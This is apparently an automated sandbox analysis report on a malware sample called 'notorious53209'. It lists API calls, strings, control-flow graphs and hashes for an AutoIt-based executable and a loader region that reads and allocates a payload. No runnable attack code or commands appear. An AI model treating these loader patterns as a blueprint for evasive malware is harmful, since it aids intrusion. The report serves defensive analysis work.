                                            • Opcode ID: 544a41bf3c419b5c2fa29e10df7dda851990d7b6bda4ce81f6705cc879739249
                                            • Instruction ID: 85165f573b79422d9529d1785c57752d5bd7cdd09d44c949ccf408211ef2022b
                                            • Opcode Fuzzy Hash: 544a41bf3c419b5c2fa29e10df7dda851990d7b6bda4ce81f6705cc879739249
                                            • Instruction Fuzzy Hash: C3714CB14283019EC714EF29EC859ABB7F8FF597A0F40093EF845971A0DB3099A8CB51

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00233A62
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00233A71
                                            • LoadIconW.USER32(00000063), ref: 00233A88
                                            • LoadIconW.USER32(000000A4), ref: 00233A9A
                                            • LoadIconW.USER32(000000A2), ref: 00233AAC
                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00233AD2
                                            • RegisterClassExW.USER32(?), ref: 00233B28
                                              • Part of subcall function 00233041: GetSysColorBrush.USER32(0000000F), ref: 00233074
                                              • Part of subcall function 00233041: RegisterClassExW.USER32(00000030), ref: 0023309E
                                              • Part of subcall function 00233041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002330AF
                                              • Part of subcall function 00233041: LoadIconW.USER32(000000A9), ref: 002330F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                            • String ID: #$0$AutoIt v3
                                            • API String ID: 2880975755-4155596026
                                            • Opcode ID: 1a8f90283bc363e3193f2f7f933a7d1b230a38bca8734600c0f0195324ac4ede
                                            • Instruction ID: ddb6019b5ce7a03206e16d5946b5111353b72e7aea9f5d14eb1b11d81828e902
                                            • Opcode Fuzzy Hash: 1a8f90283bc363e3193f2f7f933a7d1b230a38bca8734600c0f0195324ac4ede
                                            • Instruction Fuzzy Hash: FF212870A10308AFEB109FA4FD0DBAD7FB5EB08761F10426AE904A62A0D7B65654DF84

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b/
                                            • API String ID: 1825951767-3779802150
                                            • Opcode ID: df722709469ff5b72c2fc3a6b62bb6a84ca1aa36d5057eb577cd5938e820f0e1
                                            • Instruction ID: 15bdf1ca505c1c38f2aa5e6169cd7996a25606c283d03d71353ff3e4f92f9d90
                                            • Opcode Fuzzy Hash: df722709469ff5b72c2fc3a6b62bb6a84ca1aa36d5057eb577cd5938e820f0e1
                                            • Instruction Fuzzy Hash: 77A13DB293022D9ACB04EFA0DC95AEEB7B8BF15740F040529F416A7191DF746A69CF60

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 002503A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002503D3
                                              • Part of subcall function 002503A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 002503DB
                                              • Part of subcall function 002503A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002503E6
                                              • Part of subcall function 002503A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002503F1
                                              • Part of subcall function 002503A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 002503F9
                                              • Part of subcall function 002503A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00250401
                                              • Part of subcall function 00246259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 002462B4
                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0023FB2D
                                            • OleInitialize.OLE32(00000000), ref: 0023FBAA
                                            • CloseHandle.KERNEL32(00000000), ref: 002749F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                            • String ID: <g/$\d/$%,$c/
                                            • API String ID: 3094916012-1666641165
                                            • Opcode ID: 8259276f2aecede7412412e0a5c3ede0e38214ffd25272496d343b2d1dfee536
                                            • Instruction ID: d1762aa769a08f068f70bc93b7a5255d49eaf5d40318bc5c73f8c4523390368c
                                            • Opcode Fuzzy Hash: 8259276f2aecede7412412e0a5c3ede0e38214ffd25272496d343b2d1dfee536
                                            • Instruction Fuzzy Hash: 0C81B7B09202858ED7A4EF29FD5D635BAF5FB98BA8710817ED419C7362EB314428CF10

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 991 1625e0-16268e call 160000 994 162695-1626bb call 1634f0 CreateFileW 991->994 997 1626c2-1626d2 994->997 998 1626bd 994->998 1006 1626d4 997->1006 1007 1626d9-1626f3 VirtualAlloc 997->1007 999 16280d-162811 998->999 1000 162853-162856 999->1000 1001 162813-162817 999->1001 1003 162859-162860 1000->1003 1004 162823-162827 1001->1004 1005 162819-16281c 1001->1005 1008 1628b5-1628ca 1003->1008 1009 162862-16286d 1003->1009 1010 162837-16283b 1004->1010 1011 162829-162833 1004->1011 1005->1004 1006->999 1012 1626f5 1007->1012 1013 1626fa-162711 ReadFile 1007->1013 1018 1628cc-1628d7 VirtualFree 1008->1018 1019 1628da-1628e2 1008->1019 1016 162871-16287d 1009->1016 1017 16286f 1009->1017 1020 16283d-162847 1010->1020 1021 16284b 1010->1021 1011->1010 1012->999 1014 162713 1013->1014 1015 162718-162758 VirtualAlloc 1013->1015 1014->999 1022 16275f-16277a call 163740 1015->1022 1023 16275a 1015->1023 1024 162891-16289d 1016->1024 1025 16287f-16288f 1016->1025 1017->1008 1018->1019 1020->1021 1021->1000 1031 162785-16278f 1022->1031 1023->999 1028 16289f-1628a8 1024->1028 1029 1628aa-1628b0 1024->1029 1027 1628b3 1025->1027 1027->1003 1028->1027 1029->1027 1032 1627c2-1627d6 call 163550 1031->1032 1033 162791-1627c0 call 163740 1031->1033 1039 1627da-1627de 1032->1039 1040 1627d8 1032->1040 1033->1031 1041 1627e0-1627e4 CloseHandle 1039->1041 1042 1627ea-1627ee 1039->1042 1040->999 1041->1042 1043 1627f0-1627fb VirtualFree 1042->1043 1044 1627fe-162807 1042->1044 1043->1044 1044->994 1044->999
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001626B1
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001628D7
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395533851.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_160000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                            • Instruction ID: 28ab525f89c351d52664d6d931baf61656d2f35b059a954c34c1fb948f8a43fb
                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                            • Instruction Fuzzy Hash: 14A11774E00209EBDB14CFA4C994BEEBBB5FF58305F208159E511BB280D7799A91CF94

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1112 2339e7-233a57 CreateWindowExW * 2 ShowWindow * 2
                                            APIs
                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00233A15
                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00233A36
                                            • ShowWindow.USER32(00000000), ref: 00233A4A
                                            • ShowWindow.USER32(00000000), ref: 00233A53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$CreateShow
                                            • String ID: AutoIt v3$edit
                                            • API String ID: 1584632944-3779509399
                                            • Opcode ID: 902d17e84c5b5d01fa46b7d97c37a00c9b0748dfc75af18b65d2e90f8bd75ec0
                                            • Instruction ID: a5204afc04fe5f8a1a01df97678b94e6420ab768fd114ee2364e59373fe07fba
                                            • Opcode Fuzzy Hash: 902d17e84c5b5d01fa46b7d97c37a00c9b0748dfc75af18b65d2e90f8bd75ec0
                                            • Instruction Fuzzy Hash: 3CF0D471641294BEEA711B2BBC4DE776E7DE7C7FA0F10413ABD04A21B0C6A61851DAB0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1113 1623b0-1624d7 call 160000 call 1622a0 CreateFileW 1120 1624de-1624ee 1113->1120 1121 1624d9 1113->1121 1124 1624f5-16250f VirtualAlloc 1120->1124 1125 1624f0 1120->1125 1122 16258e-162593 1121->1122 1126 162513-16252a ReadFile 1124->1126 1127 162511 1124->1127 1125->1122 1128 16252e-162568 call 1622e0 call 1612a0 1126->1128 1129 16252c 1126->1129 1127->1122 1134 162584-16258c ExitProcess 1128->1134 1135 16256a-16257f call 162330 1128->1135 1129->1122 1134->1122 1135->1134
                                            APIs
                                              • Part of subcall function 001622A0: Sleep.KERNELBASE(000001F4), ref: 001622B1
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001624CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395533851.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_160000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CreateFileSleep
                                            • String ID: S3BHZIY1UKJ6DTUVS37LPNA1
                                            • API String ID: 2694422964-3650088209
                                            • Opcode ID: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
                                            • Instruction ID: be2b412c5d0d5b3c7d04c28f2d8696837cdb518310c30ff50c0e3d64b0788201
                                            • Opcode Fuzzy Hash: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
                                            • Instruction Fuzzy Hash: 9D519230D04289DBEF11DBA4CC58BEEBBB9AF15300F044199E2097B2C1D7B91B48CBA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1137 23410d-234123 1138 234200-234204 1137->1138 1139 234129-23413e call 237b76 1137->1139 1142 234144-234164 call 237d2c 1139->1142 1143 26d5dd-26d5ec LoadStringW 1139->1143 1146 26d5f7-26d60f call 237c8e call 237143 1142->1146 1147 23416a-23416e 1142->1147 1143->1146 1155 23417e-2341fb call 253020 call 23463e call 252ffc Shell_NotifyIconW call 235a64 1146->1155 1159 26d615-26d633 call 237e0b call 237143 call 237e0b 1146->1159 1149 234205-23420e call 2381a7 1147->1149 1150 234174-234179 call 237c8e 1147->1150 1149->1155 1150->1155 1155->1138 1159->1155
                                            APIs
                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0026D5EC
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            • _memset.LIBCMT ref: 0023418D
                                            • _wcscpy.LIBCMT ref: 002341E1
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002341F1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                            • String ID: Line:
                                            • API String ID: 3942752672-1585850449
                                            • Opcode ID: 3b2488072151fd4eef1807653e556d749d8c08ca35419fcca83806737939b4cb
                                            • Instruction ID: 08ab8dffc3d7b60222df9d282663714da18f95f39500c73c8c0cd2a5d17d8ed0
                                            • Opcode Fuzzy Hash: 3b2488072151fd4eef1807653e556d749d8c08ca35419fcca83806737939b4cb
                                            • Instruction Fuzzy Hash: 0E31E7F15283056AD731EB60EC49FEB77ECAF44314F10452AF989920A1DB70A668CF93

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1231 25564d-255666 1232 255683 1231->1232 1233 255668-25566d 1231->1233 1234 255685-25568b 1232->1234 1233->1232 1235 25566f-255671 1233->1235 1236 255673-255678 call 258d68 1235->1236 1237 25568c-255691 1235->1237 1245 25567e call 258ff6 1236->1245 1239 255693-25569d 1237->1239 1240 25569f-2556a3 1237->1240 1239->1240 1242 2556c3-2556d2 1239->1242 1243 2556a5-2556b0 call 253020 1240->1243 1244 2556b3-2556b5 1240->1244 1248 2556d4-2556d7 1242->1248 1249 2556d9 1242->1249 1243->1244 1244->1236 1247 2556b7-2556c1 1244->1247 1245->1232 1247->1236 1247->1242 1250 2556de-2556e3 1248->1250 1249->1250 1253 2557cc-2557cf 1250->1253 1254 2556e9-2556f0 1250->1254 1253->1234 1255 255731-255733 1254->1255 1256 2556f2-2556fa 1254->1256 1258 255735-255737 1255->1258 1259 25579d-25579e call 260df7 1255->1259 1256->1255 1257 2556fc 1256->1257 1260 255702-255704 1257->1260 1261 2557fa 1257->1261 1262 255739-255741 1258->1262 1263 25575b-255766 1258->1263 1272 2557a3-2557a7 1259->1272 1267 255706-255708 1260->1267 1268 25570b-255710 1260->1268 1269 2557fe-255807 1261->1269 1270 255751-255755 1262->1270 1271 255743-25574f 1262->1271 1265 255768 1263->1265 1266 25576a-25576d 1263->1266 1265->1266 1274 2557d4-2557d8 1266->1274 1275 25576f-25577b call 254916 call 2610ab 1266->1275 1267->1268 1268->1274 1276 255716-25572f call 260f18 1268->1276 1269->1234 1273 255757-255759 1270->1273 1271->1273 1272->1269 1277 2557a9-2557ae 1272->1277 1273->1266 1279 2557ea-2557f5 call 258d68 1274->1279 1280 2557da-2557e7 call 253020 1274->1280 1292 255780-255785 1275->1292 1291 255792-25579b 1276->1291 1277->1274 1278 2557b0-2557c1 1277->1278 1283 2557c4-2557c6 1278->1283 1279->1245 1280->1279 1283->1253 1283->1254 1291->1283 1293 25580c-255810 1292->1293 1294 25578b-25578e 1292->1294 1293->1269 1294->1261 1295 255790 1294->1295 1295->1291
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                            • String ID:
                                            • API String ID: 1559183368-0
                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                            • Instruction ID: 5160e8c68027894b81d8465859e2116117947c546926f0ddc0a7a6d9e71f8a94
                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                            • Instruction Fuzzy Hash: 6851B930A20B16DBDB248F79C8A466EB7B5AF44332F648729FC25961D0D7709D788F48
                                            APIs
                                              • Part of subcall function 00234F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002F62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00234F6F
                                            • _free.LIBCMT ref: 0026E68C
                                            • _free.LIBCMT ref: 0026E6D3
                                              • Part of subcall function 00236BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00236D0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                            • API String ID: 2861923089-1757145024
                                            • Opcode ID: 28f6f707785f5534fd3b9f80eb9085931cc4ebda811b97d9f13074791c40cb25
                                            • Instruction ID: 1198aee02f270e2b7f3fe3c24eab70afc8ba6b41bc150e16c70c64ce36ee43b0
                                            • Opcode Fuzzy Hash: 28f6f707785f5534fd3b9f80eb9085931cc4ebda811b97d9f13074791c40cb25
                                            • Instruction Fuzzy Hash: AD918E75930219AFCF14EFA4C8819EDB7B8FF19314F15446AF816AB291EB30A964CF50
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002335A1,SwapMouseButtons,00000004,?), ref: 002335D4
                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,002335A1,SwapMouseButtons,00000004,?,?,?,?,00232754), ref: 002335F5
                                            • RegCloseKey.ADVAPI32(00000000,?,?,002335A1,SwapMouseButtons,00000004,?,?,?,?,00232754), ref: 00233617
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Control Panel\Mouse
                                            • API String ID: 3677997916-824357125
                                            • Opcode ID: 7ab86238a2919c6f75e76b6473d4122ba6a149090adb7ca97a7b4518aa59c874
                                            • Instruction ID: 16baa8d1787ee8a05048683dbd60d322a32579898d69ef97d284ad33870cab3c
                                            • Opcode Fuzzy Hash: 7ab86238a2919c6f75e76b6473d4122ba6a149090adb7ca97a7b4518aa59c874
                                            • Instruction Fuzzy Hash: B2115AB1920208BFDB20DF64EC45EAEB7BCEF04740F004569F805D7210D2719F609B64
                                            APIs
                                              • Part of subcall function 00235045: _fseek.LIBCMT ref: 0023505D
                                              • Part of subcall function 002999BE: _wcscmp.LIBCMT ref: 00299AAE
                                              • Part of subcall function 002999BE: _wcscmp.LIBCMT ref: 00299AC1
                                            • _free.LIBCMT ref: 0029992C
                                            • _free.LIBCMT ref: 00299933
                                            • _free.LIBCMT ref: 0029999E
                                              • Part of subcall function 00252F95: HeapFree.KERNEL32(00000000,00000000), ref: 00252FA9
                                              • Part of subcall function 00252F95: GetLastError.KERNEL32(00000000,?,00259C64), ref: 00252FBB
                                            • _free.LIBCMT ref: 002999A6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                            • String ID:
                                            • API String ID: 1552873950-0
                                            • Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                            • Instruction ID: 1a3a61cacc83791b5df472928a6fe87209ffd1818421f636ffb0c5ffe3772f7e
                                            • Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                            • Instruction Fuzzy Hash: B65150F1914228AFDF249F64DC41A9EBBB9EF48310F1404AEB609A7241DB715E94CF58
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                            • String ID:
                                            • API String ID: 2782032738-0
                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                            • Instruction ID: 84967f15a4e79eaf382f1e3cfee8cf7fd5182e2f618ed1ab761261136838a380
                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
